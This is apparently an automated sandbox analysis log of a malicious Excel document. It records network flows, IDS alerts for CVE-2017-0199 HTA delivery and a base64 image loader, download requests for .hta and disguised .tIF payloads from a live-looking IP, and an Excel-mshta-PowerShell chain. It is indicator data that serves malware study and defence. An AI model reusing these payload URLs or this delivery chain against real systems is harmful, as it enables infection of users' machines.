      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.210.215.8:80 -> 192.168.2.22:49164
      Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.210.215.8:80 -> 192.168.2.22:49162
      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.97:443 -> 192.168.2.22:49172
      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.97:443 -> 192.168.2.22:49174
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/ERFFDR.txt HTTP/1.1Host: 192.210.215.8Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/ERFFDR.txt HTTP/1.1Host: 192.210.215.8Connection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 24.199.88.84 24.199.88.84
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49170 -> 192.210.215.8:80
      Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.210.215.8:80
      Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficHTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.215.8Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.210.215.8If-Range: "20b6a-6251ccc7de906"
      Source: global trafficHTTP traffic detected: GET /540/createdbestthingswithniceworkgreath.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.215.8Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 23 Oct 2024 03:51:20 GMTConnection: Keep-AliveHost: 192.210.215.8If-None-Match: "20b6a-6251ccc7de906"
      Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49171 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE88E54B18 URLDownloadToFileW,5_2_000007FE88E54B18
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86CC8246.emfJump to behavior
      Source: global trafficHTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.215.8Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.210.215.8If-Range: "20b6a-6251ccc7de906"
      Source: global trafficHTTP traffic detected: GET /540/createdbestthingswithniceworkgreath.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.215.8Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 23 Oct 2024 03:51:20 GMTConnection: Keep-AliveHost: 192.210.215.8If-None-Match: "20b6a-6251ccc7de906"
      Source: global trafficHTTP traffic detected: GET /540/ERFFDR.txt HTTP/1.1Host: 192.210.215.8Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/ERFFDR.txt HTTP/1.1Host: 192.210.215.8Connection: Keep-Alive
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: u4u.kids
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:40:27 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25Content-Length: 299Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 32 31 30 2e 32 31 35 2e 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 192.210.215.8 Port 80</address></body></html>
      Source: mshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/
      Source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/created
      Source: powershell.exe, 00000011.00000002.488335048.000000000290C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIF
      Source: powershell.exe, 00000005.00000002.473584199.000000001A227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFC
      Source: powershell.exe, 00000011.00000002.495821234.000000001AA8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFI
      Source: powershell.exe, 00000011.00000002.495821234.000000001AA8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFV
      Source: powershell.exe, 00000005.00000002.473584199.000000001A227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFZ
      Source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFp
      Source: mshta.exe, 0000000F.00000002.479518497.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta...
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta//1C:
      Source: mshta.exe, 00000004.00000003.427286039.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426419047.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.428563336.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta3
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta5
      Source: mshta.exe, 00000004.00000002.429236849.000000000337D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426395539.000000000337C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428101391.000000000337C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta50A%25253Ch
      Source: mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta?
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaEM
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaM
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaP
      Source: mshta.exe, 0000000F.00000003.467508099.0000000003C67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaP(
      Source: mshta.exe, 00000004.00000003.427286039.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426419047.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.428563336.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaUC
